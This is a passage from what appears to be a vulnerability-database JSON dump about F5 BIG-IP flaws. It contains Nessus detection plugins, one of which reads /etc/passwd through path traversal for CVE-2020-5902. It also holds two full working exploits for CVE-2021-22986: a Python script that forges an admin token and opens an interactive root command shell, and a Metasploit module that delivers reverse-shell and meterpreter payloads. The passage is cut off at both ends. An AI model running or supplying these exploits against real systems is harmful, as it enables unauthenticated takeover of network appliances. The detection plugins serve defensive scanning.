make_list(\"16.0.0\",\"15.1.0.4\",\"15.0.1.4\",\"14.1.2.6\",\"13.1.3.4\",\"12.1.5.2\",\"11.6.5.2\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\",\"11.6.1-11.6.5\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.4\",\"15.0.1.4\",\"14.1.2.6\",\"13.1.3.4\",\"12.1.5.2\",\"11.6.5.2\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\",\"11.6.1-11.6.5\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.4\",\"15.0.1.4\",\"14.1.2.6\",\"13.1.3.4\",\"12.1.5.2\",\"11.6.5.2\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\",\"11.6.1-11.6.5\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.4\",\"15.0.1.4\",\"14.1.2.6\",\"13.1.3.4\",\"12.1.5.2\",\"11.6.5.2\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\",\"11.6.1-11.6.5\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.4\",\"15.0.1.4\",\"14.1.2.6\",\"13.1.3.4\",\"12.1.5.2\",\"11.6.5.2\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-31T16:35:36", "description": "A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the Configuration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.\n\nNote: An initial mitigation for this vulnerability was released by the vendor, which can be bypassed.\nThis plugin also tests for the bypass of that initial mitigation.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-07-06T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : TMUI RCE (CVE-2020-5902) (Direct Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-5902"], "modified": "2022-02-25T00:00:00", "cpe": ["cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_analytics", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_domain_name_system", "cpe:/a:f5:big-ip_fraud_protection_service", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager"], "id": "F5_CVE-2020-5902.NASL", "href": "https://www.tenable.com/plugins/nessus/138140", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138140);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/25\");\n\n script_cve_id(\"CVE-2020-5902\");\n script_xref(name:\"IAVA\", value:\"2020-A-0283-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n\n script_name(english:\"F5 Networks BIG-IP : TMUI RCE (CVE-2020-5902) (Direct Check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"BIG-IP Traffic Management User Interface Remote Code Execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the\nConfiguration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute\narbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.\n\nNote: An initial mitigation for this vulnerability was released by the vendor, which can be bypassed.\nThis plugin also tests for the bypass of that initial mitigation.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K52145254\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to a version recommended in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-5902\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"F5 BIG-IP Traffic Management User Interface File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'F5 BIG-IP TMUI Directory Traversal and File Upload RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_analytics\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_domain_name_system\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_fraud_protection_service\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"bigip_web_detect.nasl\");\n script_require_keys(\"installed_sw/F5 BIG-IP web management\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('install_func.inc');\n\napp = 'F5 BIG-IP web management';\nget_install_count(app_name:app, exit_if_zero:TRUE);\nport = get_http_port(default:443, ignore_broken:TRUE, embedded:TRUE);\ninstall = get_single_install(app_name:app, port:port);\npasswd_pattern = \"root:.*:0:[01]:\";\npoc_path = '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd';\nbypass_path = '/hsqldb;';\n\nfile = \"/etc/passwd\";\ngeneric = FALSE;\nline_limit = 10;\n\nurl = build_url(qs:\"/\", port:port);\n\nres = http_send_recv3(\n method : 'GET',\n port : port,\n item : poc_path,\n exit_on_fail : TRUE\n);\n\nif (!egrep(pattern:passwd_pattern, string:res[2]))\n{\n\n res = http_send_recv3(\n method : 'GET',\n port : port,\n item : bypass_path,\n exit_on_fail : TRUE\n );\n\n if('HSQL Database Engine Servlet'>< res[2])\n {\n output = chomp(res[2]);\n file = NULL;\n generic = TRUE;\n line_limit = 3;\n }\n else\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);\n}\nelse{\n output = str_replace(string:res[2], find:'\\\\n', replace:'\\n');\n}\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n request : make_list(http_last_sent_request()),\n file : file,\n generic : generic,\n output : output,\n line_limit : line_limit,\n attach_type : 'text/plain'\n);\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-10-12T11:09:51", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-02T00:00:00", "type": "zdt", "title": "F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated) Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-04-02T00:00:00", "id": "1337DAY-ID-36067", "href": "https://0day.today/exploit/description/36067", "sourceData": "# Exploit Title: F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)\r\n# Exploit Author: Al1ex\r\n# Vendor Homepage: https://www.f5.com/products/big-ip-services\r\n# Version: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2\r\n# CVE : CVE-2021-22986\r\n\r\nimport requests\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\nimport sys\r\n\r\n\r\ndef title():\r\n print('''\r\n ______ ____ ____ _______ ___ ___ ___ __ ___ ___ ___ ___ __ \r\n / |\\ \\ / / | ____| |__ \\ / _ \\ |__ \\ /_ | |__ \\ |__ \\ / _ \\ / _ \\ / / \r\n | ,----' \\ \\/ / | |__ ______ ) | | | | | ) | | | ______ ) | ) | | (_) | | (_) | / /_ \r\n | | \\ / | __| |______/ / | | | | / / | | |______/ / / / \\__, | > _ < | '_ \\ \r\n | `----. \\ / | |____ / /_ | |_| | / /_ | | / /_ / /_ / / | (_) | | (_) | \r\n \\______| \\__/ |_______| |____| \\___/ |____| |_| |____| |____| /_/ \\___/ \\___/ \r\n \r\n Author:[email\u00a0protected]\r\n Github:https://github.com/Al1ex\r\n ''') \r\n\r\ndef exploit(url):\r\n\ttarget_url = url + '/mgmt/shared/authn/login'\r\n\tdata = {\r\n\t\t\"bigipAuthCookie\":\"\",\r\n\t\t\"username\":\"admin\",\r\n\t\t\"loginReference\":{\"link\":\"/shared/gossip\"},\r\n\t\t\"userReference\":{\"link\":\"https://localhost/mgmt/shared/authz/users/admin\"}\r\n\t}\r\n\theaders = {\r\n\t\t\"User-Agent\": \"hello-world\",\r\n\t\t\"Content-Type\":\"application/x-www-form-urlencoded\"\r\n\t}\r\n\tresponse = requests.post(target_url, headers=headers, json=data, verify=False, timeout=15)\r\n\tif \"/mgmt/shared/authz/tokens/\" not in response.text:\r\n\t\tprint('(-) Get token fail !!!')\r\n\t\tprint('(*) Tested Method 2:') \r\n\t\theader_2 = {\r\n\t\t 'User-Agent': 'hello-world',\r\n\t\t 'Content-Type': 'application/json',\r\n\t\t 'X-F5-Auth-Token': '',\r\n\t\t 'Authorization': 'Basic YWRtaW46QVNhc1M='\r\n\t\t}\r\n\t\tdata_2 = {\r\n\t\t\t\"command\": \"run\", \r\n\t\t\t\"utilCmdArgs\": \"-c whoami\"\r\n\t\t}\r\n\t\tcheck_url = url + '/mgmt/tm/util/bash'\r\n\t\ttry:\r\n\t\t\tresponse2 = requests.post(url=check_url, json=data_2, headers=header_2, verify=False, timeout=20)\r\n\t\t\tif response2.status_code == 200 and 'commandResult' in response2.text:\r\n\t\t\t\twhile True:\r\n\t\t\t\t\tcmd = input(\"(:CMD)> \")\r\n\t\t\t\t\tdata_3 = {\"command\": \"run\", \"utilCmdArgs\": \"-c '%s'\"%(cmd)}\r\n\t\t\t\t\tr = requests.post(url=check_url, json=data_3, headers=header_2, verify=False)\r\n\t\t\t\t\tif r.status_code == 200 and 'commandResult' in r.text:\r\n\t\t\t\t\t\tprint(r.text.split('commandResult\":\"')[1].split('\"}')[0].replace('\\\\n', ''))\r\n\t\t\telse:\r\n\t\t\t\tprint('(-) Not vuln...')\r\n\t\t\t\texit(0)\r\n\t\texcept Exception:\r\n\t\t\tprint('ERROR Connect')\r\n\tprint('(+) Extract token: %s'%(response.text.split('\"selfLink\":\"https://localhost/mgmt/shared/authz/tokens/')[1].split('\"}')[0]))\r\n\twhile True:\r\n\t\tcmd = input(\"(:CMD)> \")\r\n\t\theaders = {\r\n\t\t\t\"Content-Type\": \"application/json\",\r\n\t\t\t\"X-F5-Auth-Token\": \"%s\"%(response.text.split('\"selfLink\":\"https://localhost/mgmt/shared/authz/tokens/')[1].split('\"}')[0])\r\n\t\t}\r\n\t\tdata_json = {\r\n\t\t\t\"command\": \"run\", \r\n\t\t\t\"utilCmdArgs\": \"-c \\'%s\\'\"%(cmd)\r\n\t\t}\r\n\t\texp_url= url + '/mgmt/tm/util/bash'\r\n\t\texp_req = requests.post(exp_url, headers=headers, json=data_json, verify=False, timeout=15)\r\n\t\tif exp_req.status_code == 200 and 'commandResult' in exp_req.text:\r\n\t\t\tprint(exp_req.text.split('commandResult\":\"')[1].split('\"}')[0].replace('\\\\n', ''))\r\n\t\telse:\r\n\t\t\tprint('(-) Not vuln...')\r\n\t\t\texit(0)\r\n\r\nif __name__ == '__main__':\r\n title()\r\n if(len(sys.argv) < 2):\r\n \tprint('[+] USAGE: python3 %s https://<target_url>\\n'%(sys.argv[0]))\r\n \texit(0)\r\n else:\r\n \texploit(sys.argv[1])\n\n# 0day.today [2021-10-12] #", "sourceHref": "https://0day.today/exploit/36067", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-12T11:09:51", "description": "This Metasploit module exploits a pre-authentication server-side request forgery vulnerability in the F5 iControl REST API's /mgmt/shared/authn/login endpoint to generate an X-F5-Auth-Token that can be used to execute root commands on an affected BIG-IP or BIG-IQ device.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-02T00:00:00", "type": "zdt", "title": "F5 iControl Server-Side Request Forgery / Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-04-02T00:00:00", "id": "1337DAY-ID-36066", "href": "https://0day.today/exploit/description/36066", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'F5 iControl REST Unauthenticated SSRF Token Generation RCE',\r\n 'Description' => %q{\r\n This module exploits a pre-auth SSRF in the F5 iControl REST API's\r\n /mgmt/shared/authn/login endpoint to generate an X-F5-Auth-Token that\r\n can be used to execute root commands on an affected BIG-IP or BIG-IQ\r\n device. This vulnerability is known as CVE-2021-22986.\r\n\r\n CVE-2021-22986 affects the following BIG-IP versions:\r\n\r\n * 12.1.0 - 12.1.5\r\n * 13.1.0 - 13.1.3\r\n * 14.1.0 - 14.1.3\r\n * 15.1.0 - 15.1.2\r\n * 16.0.0 - 16.0.1\r\n\r\n And the following BIG-IQ versions:\r\n\r\n * 6.0.0 - 6.1.0\r\n * 7.0.0\r\n * 7.1.0\r\n\r\n Tested against BIG-IP Virtual Edition 16.0.1 in VMware Fusion.\r\n },\r\n 'Author' => [\r\n 'wvu', # Analysis and exploit\r\n 'Rich Warren' # First blood (RCE) and endpoint collaboration\r\n ],\r\n 'References' => [\r\n ['CVE', '2021-22986'],\r\n ['URL', 'https://support.f5.com/csp/article/K03009991'],\r\n ['URL', 'https://attackerkb.com/assessments/f6b19d24-b24e-4abd-98cf-2988d7424311'],\r\n ['URL', 'https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/']\r\n # https://clouddocs.f5.com/products/big-iq/mgmt-api/v7.0.0/ApiReferences/bigiq_public_api_ref/r_auth_login.html\r\n ],\r\n 'DisclosureDate' => '2021-03-10', # Vendor advisory\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['unix', 'linux'],\r\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\r\n 'Privileged' => true,\r\n 'Targets' => [\r\n [\r\n 'Unix Command',\r\n {\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Type' => :unix_cmd,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\r\n }\r\n }\r\n ],\r\n [\r\n 'Linux Dropper',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Type' => :linux_dropper,\r\n 'DefaultOptions' => {\r\n 'CMDSTAGER::FLAVOR' => :bourne,\r\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\r\n }\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'SSL' => true\r\n },\r\n 'Notes' => {\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session\r\n 'SideEffects' => [\r\n IOC_IN_LOGS, # /var/log/restjavad.0.log (rotated)\r\n ACCOUNT_LOCKOUTS, # Unlikely with bigipAuthCookie\r\n ARTIFACTS_ON_DISK # CmdStager\r\n ]\r\n }\r\n )\r\n )\r\n\r\n register_options([\r\n Opt::RPORT(443),\r\n OptString.new('TARGETURI', [true, 'Base path', '/']),\r\n OptString.new('USERNAME', [true, 'Valid admin username', 'admin']),\r\n OptString.new('ENDPOINT', [false, 'Custom token generation endpoint'])\r\n ])\r\n\r\n register_advanced_options([\r\n OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])\r\n ])\r\n end\r\n\r\n def username\r\n datastore['USERNAME']\r\n end\r\n\r\n def user_reference_endpoint\r\n normalize_uri(target_uri.path, '/mgmt/shared/authz/users', username)\r\n end\r\n\r\n def check\r\n generate_token_ssrf ? CheckCode::Vulnerable : CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n return unless (@token ||= generate_token_ssrf)\r\n\r\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\r\n\r\n case target['Type']\r\n when :unix_cmd\r\n execute_command(payload.encoded)\r\n when :linux_dropper\r\n execute_cmdstager\r\n end\r\n end\r\n\r\n def generate_token_ssrf\r\n print_status('Generating token via SSRF...')\r\n vprint_status(\"Username: #{username}\")\r\n vprint_status(\"Endpoint: #{login_reference_endpoint}\")\r\n\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '/mgmt/shared/authn/login'),\r\n 'ctype' => 'application/json',\r\n 'data' => {\r\n 'username' => username,\r\n 'bigipAuthCookie' => '',\r\n 'authProviderName' => 'local',\r\n 'loginReference' => {\r\n 'link' => \"https://localhost#{login_reference_endpoint}\"\r\n },\r\n 'userReference' => {\r\n 'link' => \"https://localhost#{user_reference_endpoint}\"\r\n }\r\n }.to_json\r\n )\r\n\r\n unless res&.code == 200 && (@token = res.get_json_document.dig('token', 'token'))\r\n print_error('Failed to generate token')\r\n return\r\n end\r\n\r\n print_good(\"Successfully generated token: #{@token}\")\r\n @token\r\n end\r\n\r\n def execute_command(cmd, _opts = {})\r\n bash_cmd = \"eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)\"\r\n\r\n print_status(\"Executing command: #{bash_cmd}\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '/mgmt/tm/util/bash'),\r\n 'ctype' => 'application/json',\r\n 'headers' => {\r\n 'X-F5-Auth-Token' => @token\r\n },\r\n 'data' => {\r\n 'command' => 'run',\r\n 'utilCmdArgs' => \"-c '#{bash_cmd}'\"\r\n }.to_json\r\n }, datastore['CmdExecTimeout'])\r\n\r\n unless res\r\n vprint_warning('Command execution timed out')\r\n return\r\n end\r\n\r\n unless res.code == 200 && res.get_json_document['kind'] == 'tm:util:bash:runstate'\r\n fail_with(Failure::PayloadFailed, 'Failed to execute command')\r\n end\r\n\r\n print_good('Successfully executed command')\r\n\r\n return unless (cmd_result = res.get_json_document['commandResult'])\r\n\r\n vprint_line(cmd_result)\r\n end\r\n\r\n def login_reference_endpoint\r\n if datastore['ENDPOINT']\r\n return normalize_uri(target_uri.path, datastore['ENDPOINT'])\r\n end\r\n\r\n @token_generation_endpoint ||= token_generation_endpoints.sample\r\n\r\n normalize_uri(target_uri.path, @token_generation_endpoint)\r\n end\r\n\r\n # Usable token generation endpoints between versions 12.1.4 and 16.0.1\r\n def token_generation_endpoints\r\n %w[\r\n /access/file-path-manager/indexing\r\n /cm/autodeploy/cluster-software-images/indexing\r\n /cm/autodeploy/qkview/indexing\r\n /cm/autodeploy/software-images/indexing\r\n /cm/autodeploy/software-volume-install/indexing\r\n /cm/system/authn/providers/tmos/1f44a60e-11a7-3c51-a49f-82983026b41b/users/indexing\r\n /cm/system/authn/providers/tmos/indexing\r\n /mgmt/shared/analytics/avr-proxy-tasks\r\n /mgmt/shared/gossip\r\n /mgmt/shared/gossip-peer-refresher\r\n /mgmt/shared/identified-devices/config/device-refresh\r\n /mgmt/shared/save-config\r\n /mgmt/tm/shared/bigip-failover-state\r\n /shared/analytics/avr-proxy-tasks\r\n /shared/analytics/avr-proxy-tasks/indexing\r\n /shared/analytics/event-aggregation-tasks/indexing\r\n /shared/analytics/event-analysis-tasks/indexing\r\n /shared/authn/providers/local/groups/indexing\r\n /shared/authz/remote-resources/indexing\r\n /shared/authz/resource-groups/indexing\r\n /shared/authz/roles/indexing\r\n /shared/authz/tokens/indexing\r\n /shared/chassis-framework-upgrades/indexing\r\n /shared/device-discovery-tasks/indexing\r\n /shared/device-group-key-pairs/indexing\r\n /shared/echo/indexing\r\n /shared/framework-info-tasks/indexing\r\n /shared/framework-upgrades/indexing\r\n /shared/gossip\r\n /shared/gossip-peer-refresher\r\n /shared/group-task/indexing\r\n /shared/iapp/blocks/indexing\r\n /shared/iapp/build-package/indexing\r\n /shared/iapp/health-prefix-map/indexing\r\n /shared/iapp/package-management-tasks/indexing\r\n /shared/iapp/template-loader/indexing\r\n /shared/identified-devices/config/device-refresh\r\n /shared/nodejs/loader-path-config/indexing\r\n /shared/package-deployments/indexing\r\n /shared/resolver/device-groups/indexing\r\n /shared/resolver/device-groups/tm-shared-all-big-ips/devices/indexing\r\n /shared/root-framework-upgrades/indexing\r\n /shared/rpm-tasks/indexing\r\n /shared/save-config\r\n /shared/snapshot-task/indexing\r\n /shared/snapshot/indexing\r\n /shared/stats-information/indexing\r\n /shared/storage/tasks/indexing\r\n /shared/task-scheduler/scheduler/indexing\r\n /shared/tmsh-shell/indexing\r\n /tm/analytics/afm-sweeper/generate-report/indexing\r\n /tm/analytics/afm-sweeper/report-results/indexing\r\n /tm/analytics/application-security-anomalies/generate-report/indexing\r\n /tm/analytics/application-security-anomalies/report-results/indexing\r\n /tm/analytics/application-security-network/generate-report/indexing\r\n /tm/analytics/application-security-network/report-results/indexing\r\n /tm/analytics/application-security/generate-report/indexing\r\n /tm/analytics/application-security/report-results/indexing\r\n /tm/analytics/asm-bypass/generate-report/indexing\r\n /tm/analytics/asm-bypass/report-results/indexing\r\n /tm/analytics/asm-cpu/generate-report/indexing\r\n /tm/analytics/asm-cpu/report-results/indexing\r\n /tm/analytics/asm-memory/generate-report/indexing\r\n /tm/analytics/asm-memory/report-results/indexing\r\n /tm/analytics/cpu/generate-report/indexing\r\n /tm/analytics/cpu/report-results/indexing\r\n /tm/analytics/disk-info/generate-report/indexing\r\n /tm/analytics/disk-info/report-results/indexing\r\n /tm/analytics/dns/generate-report/indexing\r\n /tm/analytics/dns/report-results/indexing\r\n /tm/analytics/dos-l3/generate-report/indexing\r\n /tm/analytics/dos-l3/report-results/indexing\r\n /tm/analytics/http/generate-report/indexing\r\n /tm/analytics/http/report-results/indexing\r\n /tm/analytics/ip-intelligence/generate-report/indexing\r\n /tm/analytics/ip-intelligence/report-results/indexing\r\n /tm/analytics/ip-layer/generate-report/indexing\r\n /tm/analytics/ip-layer/report-results/indexing\r\n /tm/analytics/lsn-pool/generate-report/indexing\r\n /tm/analytics/lsn-pool/report-results/indexing\r\n /tm/analytics/memory/generate-report/indexing\r\n /tm/analytics/memory/report-results/indexing\r\n /tm/analytics/network/generate-report/indexing\r\n /tm/analytics/network/report-results/indexing\r\n /tm/analytics/pem/generate-report/indexing\r\n /tm/analytics/pem/report-results/indexing\r\n /tm/analytics/proc-cpu/generate-report/indexing\r\n /tm/analytics/proc-cpu/report-results/indexing\r\n /tm/analytics/protocol-security-http/generate-report/indexing\r\n /tm/analytics/protocol-security-http/report-results/indexing\r\n /tm/analytics/protocol-security/generate-report/indexing\r\n /tm/analytics/protocol-security/report-results/indexing\r\n /tm/analytics/sip/generate-report/indexing\r\n /tm/analytics/sip/report-results/indexing\r\n /tm/analytics/swg-blocked/generate-report/indexing\r\n /tm/analytics/swg-blocked/report-results/indexing\r\n /tm/analytics/swg/generate-report/indexing\r\n /tm/analytics/swg/report-results/indexing\r\n /tm/analytics/tcp-analytics/generate-report/indexing\r\n /tm/analytics/tcp-analytics/report-results/indexing\r\n /tm/analytics/tcp/generate-report/indexing\r\n /tm/analytics/tcp/report-results/indexing\r\n /tm/analytics/udp/generate-report/indexing\r\n /tm/analytics/udp/report-results/indexing\r\n /tm/analytics/vcmp/generate-report/indexing\r\n /tm/analytics/vcmp/report-results/indexing\r\n /tm/analytics/virtual/generate-report/indexing\r\n /tm/analytics/virtual/report-results/indexing\r\n /tm/shared/bigip-failover-state\r\n /tm/shared/sys/backup/indexing\r\n ]\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-12] #", "sourceHref": "https://0day.today/exploit/36066", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-27T13:59:31", "description": "Exploit for hardware platform in category web applications", "cvss3": {}, "published": 